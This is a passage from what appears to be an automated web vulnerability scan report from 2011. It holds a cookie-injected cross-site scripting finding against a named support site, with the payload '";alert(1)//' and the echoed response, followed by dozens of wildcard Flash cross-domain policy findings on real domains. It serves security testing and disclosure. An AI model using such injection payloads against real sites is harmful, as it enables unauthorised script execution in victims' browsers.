Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0 HTTP/1.1
Host: support.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_loginemail=deleted; SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9aaff5"%3balert(1)//8d66ba3bbd7;

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:48:34 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Cache-Control: max-age=3600, must-revalidate
Expires: Tue, 26 Apr 2011 19:48:37 GMT
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/javascript
Content-Length: 11543

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessionid_tbpeip8i = "36r5tssjo8ljsterx8m2rwi61oy09zq9aaff5";alert(1)//8d66ba3bbd7";
var country_tbpeip8i = "";
var countrycode_tbpeip8i = "";
var hasnotes_tbpeip8i = "";
var campaignid_tbpeip8i = "";
var campaigntitle_tbpeip8i = "";
var isfirsttime_tbpeip8i = 1;
var timer_tbpeip8i
...[SNIP]...
7. Flash cross-domain policy  previous  next
There are 61 instances of this issue:

7.1. http://195.68.160.134/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://195.68.160.134
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.134

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:37 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 07 Nov 2008 04:42:33 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:37 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...
7.2. http://195.68.160.166/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://195.68.160.166
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.166

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:26:43 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:26:43 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...
7.3. http://195.68.160.167/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://195.68.160.167
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.167

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:38 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:55 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:38 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...
7.4. http://195.68.160.40/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://195.68.160.40
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.40

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:57 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:57 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...
7.5. http://195.68.160.95/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://195.68.160.95
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.95

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:41 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:41 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...
7.6. http://a.vimeocdn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.vimeocdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.vimeocdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Apr 2011 23:28:46 GMT
ETag: "157-78810780"
Content-Type: application/xml
Cache-Control: max-age=1990877
Expires: Wed, 18 May 2011 17:04:49 GMT
Date: Mon, 25 Apr 2011 16:03:32 GMT
Content-Length: 343
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
7.7. http://ad.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:37:55 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
7.8. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
7.9. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Mon, 25 Apr 2011 21:17:49 GMT
Date: Sun, 24 Apr 2011 21:17:49 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 68752

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
7.10. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Wed, 25 May 2011 15:17:38 GMT
X-FB-Server: 10.32.72.125
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...
7.11. http://api.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.flickr.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:41:32 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Vary: Accept-Encoding
X-Served-By: www146.flickr.mud.yahoo.com
Cache-Control: private
Content-Length: 265
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...
7.12. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
7.13. http://beacon.securestudies.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
7.14. http://bs.mail.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.mail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.mail.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:29:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 15:29:05 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
7.15. http://bs.yandex.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.yandex.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.yandex.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:37 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 15:30:37 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
7.16. http://cdn-01.yumenetworks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-01.yumenetworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn-01.yumenetworks.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2
ETag: "182c001-122-454adb8106440"
Accept-Ranges: bytes
Content-Type: application/xml
Age: 121191
Date: Mon, 25 Apr 2011 14:54:12 GMT
Last-Modified: Sun, 17 Aug 2008 20:30:01 GMT
Content-Length: 290
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...
7.17. http://click-here-to-listen.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://click-here-to-listen.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: click-here-to-listen.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:54:10 GMT
Server: dg-httpd/5.0.29 (1273399797)
Accept-Ranges: bytes
Connection: close
Content-Type: text/xml
Last-Modified: Mon, 28 Apr 2008 18:04:40 GMT
ETag: "45a737ce-1e1-481611b8"
Content-Length: 481

<cross-domain-policy>
<!-- Place top level domain name -->
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
<allow-http-request-headers-from domain="*"
...[SNIP]...
<allow-access-from domain="*.*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*" to-ports="80,443" />
...[SNIP]...
7.18. http://counter.rambler.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://counter.rambler.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: counter.rambler.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:27:04 GMT
Expires: Mon, 25 Apr 2011 14:37:04 GMT
Content-type: text/plain
Content-length: 288
Last-Modified: Mon, 14 Feb 2011 12:33:32 GMT

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" secure="true" />
<allow-ht
...[SNIP]...
7.19. http://d1.openx.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:07:21 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "1bed79-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
7.20. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 619922229
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=931
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
7.21. http://event.adxpose.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1302122676000"
Last-Modified: Wed, 06 Apr 2011 20:44:36 GMT
Content-Type: application/xml
Content-Length: 203
Date: Mon, 25 Apr 2011 14:23:41 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...
7.22. http://games.mochiads.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.mochiads.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: games.mochiads.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Content-Length: 213
Last-Modified: Thu, 21 Oct 2010 04:46:54 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.105:40049
X-Mochi-Source: 10.0.0.238:27050
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-do
...[SNIP]...
7.23. http://goods.adnectar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goods.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:25 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hYFNKXjmCLwgAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.24. http://goods43.adnectar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goods43.adnectar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goods43.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:31:29 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hcFNKXjmCL4qAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.25. http://img.en25.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.en25.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.en25.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 206
Cache-Control: max-age=0
Date: Mon, 25 Apr 2011 14:54:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...
7.26. http://learn.shavlik.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: learn.shavlik.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/xml
Content-Location: http://learn.shavlik.com/crossdomain.xml
Last-Modified: Sun, 23 Aug 2009 19:48:53 GMT
Accept-Ranges: bytes
ETag: "4e3f9ebe2a24ca1:1772"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:16:43 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.27. http://m.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:37:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

